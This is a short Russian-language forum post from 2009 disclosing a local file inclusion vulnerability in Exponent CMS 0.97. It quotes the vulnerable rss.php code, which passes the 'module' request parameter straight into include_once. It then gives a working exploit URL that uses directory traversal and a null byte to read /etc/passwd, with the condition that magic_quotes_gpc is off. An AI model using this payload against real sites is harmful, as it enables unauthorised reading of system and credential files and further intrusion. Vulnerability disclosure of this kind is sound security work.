| geezer.code |
29.12.2009 11:46 |
Exponent CMS
Version: 0.97
LFI
magic_quotes_gpc = Off или "особые обстоятельства"
PHP код:
//file rss.php
if (isset($_REQUEST['module'])) {
$module = $_REQUEST['module'];
.....
if (isset($module)) {
//get the RSS Items from the module
include_once('modules/'.$module.'/class.php');
Exploit:
Код:
http://exponent/rss.php?module=../../../../etc/passwd%00
зы насчет регстр глобалз я прогнал, это в другом месте.
|
